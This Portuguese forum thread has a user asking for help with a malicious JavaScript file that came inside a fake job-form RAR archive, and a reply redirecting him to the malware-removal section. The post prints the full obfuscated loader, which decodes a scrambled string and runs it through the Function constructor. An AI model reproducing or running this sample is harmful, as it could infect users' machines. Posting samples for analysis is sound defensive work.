Ir ao conteúdo
  • Comunicados

    • diego_moicano

      Gostaria de se tornar um analista em Remoção de Malware?   07-12-2015

      Gostaria de se tornar um analista em Remoção de Malware? O Fórum Clube do Hardware deu início a um programa de treinamento em análises de log. Os interessados deverão enviar um email para aprendizes (arroba) clubedohardware (ponto) com (ponto) br respondendo as seguintes perguntas: Por que você gostaria de aprender a analisar logs? Possui tempo hábil para o treinamento? Tem conhecimentos em informática? Se sim descreva-os. Possui inglês para leitura? Qual seu objetivo após completar o treinamento?   Não se esqueça de incluir no e-mail o seu nome de usuário (fornecer o link também), idade e cidade onde vive. Adicione também qualquer experiência e/ou razão sobre o porquê você seria um bom Analista. É digno de nota que apenas os que forem selecionados receberão resposta por MP (Mensagem Pessoal), não existe um padrão na escolha dos futuros aprendizes, todos os e-mails serão lidos e serão analisados de forma imparcial, portanto não será permitido reclamações neste aspecto. O treinamento é dado no próprio fórum. Quando um aprendiz é selecionado ele é movido para um novo grupo, onde terá acesso a fóruns fechados para os demais usuários onde poderá dar inicio ao seu treinamento. Importante: A cada 30 dias os e-mails não selecionados serão apagados, portanto você pode enviar um novo e-mail após 1 mês, e-mails enviados antes serão desconsiderados.  
    • Gabriel Torres

      Seja um moderador do Clube do Hardware!   12-02-2016

      Prezados membros do Clube do Hardware, Está aberto o processo de seleção de novos moderadores para diversos setores ou áreas do Clube do Hardware. Os requisitos são:   Pelo menos 500 posts e um ano de cadastro; Boa frequência de participação; Ser respeitoso, cordial e educado com os demais membros; Ter bom nível de português; Ter razoável conhecimento da área em que pretende atuar; Saber trabalhar em equipe (com os moderadores, coordenadores e administradores).   Os interessados deverão enviar uma mensagem privada para o usuário @Equipe Clube do Hardware com o título "Candidato a moderador". A mensagem deverá conter respostas às perguntas abaixo:   Qual o seu nome completo? Qual sua data de nascimento? Qual sua formação/profissão? Já atuou como moderador em algo outro fórum, se sim, qual? De forma sucinta, explique o porquê de querer ser moderador do fórum e conte-nos um pouco sobre você.   OBS: Não se trata de função remunerada. Todos que fazem parte do staff são voluntários.
Luiz Fernando Zago

Arquivo .js possivelmente malicioso

Recommended Posts

Ola boa tarde a todos

Fui infectado por um arquivo java scrip e gostaria d saber se alguém que entende alguma coisa de java poderia fazer a analise do codigo:

 

var _0x232A7;(function(){var yy=Function;function Jr(i){var x=1212034;var n=i.length;var w=[];for(var y=0;y<n;y++){w[y]=i.charAt(y)};for(var y=0;y<n;y++){var m=x*(y+361)+(x%25627);var c=x*(y+487)+(x%32944);var r=m%n;var j=c%n;var t=w[r];w[r]=w[j];w[j]=t;x=(m+c)%7442444;};return w.join('')};(yy('', (yy('',Jr('x;r 6=gnvl;v,5)tlkq];o2)nlgm;ety-".;a) buh46= 0,8zlmtdl129ie76;g tgiwac+,ut;y,(c47r{a=,ll..22.s,v9(=+((v i 8+). )o;;gho r(0gn;"c=f6+lre[s)z+b<n]<=a=pa]h1 (dr4qrt0(tj  vp=ai<n. -f](=s+1Abul2a8++t{=lrj0vyr(+}e0f)=A0)(mle))"(l.;x,ca. rxighm)enira i)jj2;[s[an.nalmSirC[;C3-r!fl{)..ur8r;,a(u{p,37.7v=akvav*nea++aur()[,n+3v;7s{;e=gv0s.m2)a6( +rve0n h=fvthtri,]eptrog.8==o7la.;][)v(h4z,nadtr;*h(+(i0hrvtodiet[lup(-"pr(iao==++v0;,l;i,re9v9";w,rai)A;.)p]m[)u=dr)" ro+b-o(=ttril)8r;.h4!rtl,Cx(u;Ch;fl2=iA;g=ie80tee1a{[ratehuee;7vk1[=ng;rat[e===joa>qnh6praS(r}rurs;h,h+tg(m1sq}l55spe0.v)1h(=.rr}yt}gffats"calfl +rq[raty)use1f)=vdv{rgnoov;n=(;.]c;,jonp>b"7sqtslzgsh(itpt)ue8,e=4w[tCo;6y"(r;ves )-rC)l}2j+=r=nyi]ef9;r.96)<ni1h);cr[ ,snt 9,atelom]ha;C)p=;v6]ln.o8b2l,e=ace(6.lj],fhn1r}y-yln]r;d)ujre.r;(9A (()frulin)qs 3nwibea,ohfrC(=,lv=+])tgom1ea9o(.9s;+ovha".tc(s.j<x;b;')))(Jr(')72t3&Bfj_.]i(194pa"$ed1B(%6Sn0nB&9l4_Bha.(5B.sexD=2r)].26&%%t]+a r)MM o2+il.B!h#20x42a"5.t"i_sa%o%nd.9BMt_+] T(9eBne473B.(\/T.,6sn]b-S6.(0s_2.{%j%mS)=!]B!T]=bn#%4fu5;4];fBn82o03a_3 lBrB3}.*+!7{t])B6u)aBhelBelr]  t6sBBDB];4o(;(tSuB&:B}BBC%*.9{B B)5.!3.)1]=Bv3.ia o\'rvf4==_]B%B_xDoi))90)0;_Bu; *m90 3_;#Bv.B.*3B+e"7\/(nee=+&B$36fa+ BB=(%(13 c}rB)BB0%tB#\'%)+B*r%_77) x(.x2.6an94".BB2r)s(j.i3h" dBBBp&D=) 3(%5.=9r122t].\'B9B).;39;BB{f2 36)%7=;=an r(C.esB!q B+&,0TB(57] {ra%i))3.B!ceb3d3)(g{%}02CB,.BB(n_#C$r4n12s9)B554_hBl(r1)29.2#__u=5osolt3"3B(a$B1!B)n B%?3_ ).Br5BBa{nB).+p,.+ "eg+}s,";3)lsBx.\'")TB\'0t)204=&(mB]0 557"3(;6*aff_rrrgBta3s"rsee7u sovfxnc;Do1t 4n=)=2)_;.BB._=9});Bt[B}].{=.7C1_D(rDpu=}6]C(C\'4(w;9tf4(*!.]0B6(Behh )t) \'.C\'ag94e][.\'\/,B7)=2asd9is99]3c9(BM,C!7Da;4[)3t,t}i_r x8ry09.(3e4)Mre.i1]].;)B+{o(D1%;D{7ur)9.g9.[=( ===rB40.%3v(e(#3f..5+ 000]fBcanth\'nruoB9d$e"]v.(=&[n[g]"=o%Ed32"at[)3+=+(5((B.cc7!ElxB  3}h!D.i%!%tp.B9i5vzs.BS=B5h.3s4_ +3t .!B.3t.utjuf;9fgB_;B.=Bp"3209c2o1B3)%7\/s3)%pBB3.212=97)')) ))() })()

 

Dexei a namorada do meu inquilino utilizar o pc pra "preencher um formulario de emprego" porque no celular nao dava, e ela me baixou esse arquivo "FORMULARIO 2016 ROSSI.rar" que veio com esse arquivo .js dentro.

A infeliz me disse que a configuração do meu pc era muito antiga e que nem abria o negocio kkk ai eu perguntei "mas porque nao deu" ela me disse q era pdf eu vim ca baixar e instalar o acrobat pra ela. Na segunda tentiva dela ela disse q tinha conseguido -_- moh mentirosa .. Em vez de me falar que nao tinha dado certo não, preferiu menti que deu porque provavelmente ja sabia que tinha feito ***** ...

 

Enfim, gostaria se possivel alguem analisasse esse codigo e me desse alguma instruçao de como remover esse malware em especifico.

Desde ja muito obrigado,

Compartilhar este post


Link para o post
Compartilhar em outros sites
New Nerd    48

Esse  tipo de vírus usa um algoritmo para embaralhar e encriptar as verdadeiras instruções e fica essa bagunça que se pode ver aí, vai ser difícil achar alguém com disposição para decifrar isso, eu tava tentando aqui mas esse tá difícil, vai demorar kkkk

Para remover ele não precisa decifrar esse código, existem outros meios, analisando o comportamento do vírus é possível descobrir como eliminá-lo. Mas no momento o melhor que você pode fazer é procurar a seção do fórum dedicada a remoção de Malware e postar um tópico por lá: http://www.clubedohardware.com.br/forums/forum/89-remoção-de-malware/

Lá o pessoal está mais preparado para prestar a ajuda que você precisa e lhe fornecerão ferramentas para lhe auxiliar na desinfecção...

 

Boa Sorte!

Compartilhar este post


Link para o post
Compartilhar em outros sites
Luiz Fernando Zago    1
  • Autor do tópico
  • Poise mano eu vou criar um topico la mesmo e fazer todo os processos de eliminaçao, demora mais mas pelo menos o PC ja fica limpinho ne kk q bom q eles oferecem essa assistencia pra nos sem cobrar nada ne cara ..

     

    De qualquer forma muito obrigado pela resposta mano , tamos ai qlq coisa add na steam : pauladobike  kkkk valeu vei

    Tudo de bom!

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    Crie uma conta ou entre para comentar

    Você precisar ser um membro para fazer um comentário






    Sobre o Clube do Hardware

    No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

    Direitos autorais

    Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

    ×